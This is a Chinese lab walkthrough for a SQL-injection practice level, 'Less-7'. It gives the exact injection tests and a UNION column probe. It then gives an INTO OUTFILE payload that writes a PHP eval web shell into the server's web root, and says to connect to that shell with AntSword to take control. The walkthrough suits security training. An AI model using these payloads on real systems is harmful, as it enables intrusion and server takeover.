Less-7
首先,这一关的要求是使用文件进行攻击
- 判断注入情况,此时两个情况输出是不同的,所以可以断定,这个时候存在注入点。
?id=1')) and 1=1#
?id=1')) and 1=2#
- 看提示,本关要求的是使用文件注入,也就是我们要在网站创建后门进行攻击。可以考虑
into outfile
写入文件中
- 攻击载荷,
注意:$_POST要大写
'<?php @eval($_POST["mima"])?>' into outfile "F:\\phpStudy\\WWW\\sqli\\Less-7\\bad.php"
-
由于我们要在服务器上创建一个名字叫做
bad.php
的文件,所以必须要可以对服务器的文件进行写操作。 -
打开
mysql
数据库的my.ini
文件,添加一个选项。这里路径为可以写的路径secure_file_priv="F:/phpStudy/WWW/"
- 判断列数,当出现第四列报错,所以可以判断只有3列。
id=1')) union select 1,2,3 #
id=1')) union select 1,2,3,4 #
- 构造语句,这里虽然仍然有报错,但是
bad.php
文件已经创建。
- 然后可以使用
蚁剑
进行连接。至此,拿到权限。
蚁剑:
下载: https://github.com/AntSwordProject/AntSword-Loader
安装指南: https://blog.csdn.net/Ahuuua/article/details/109034528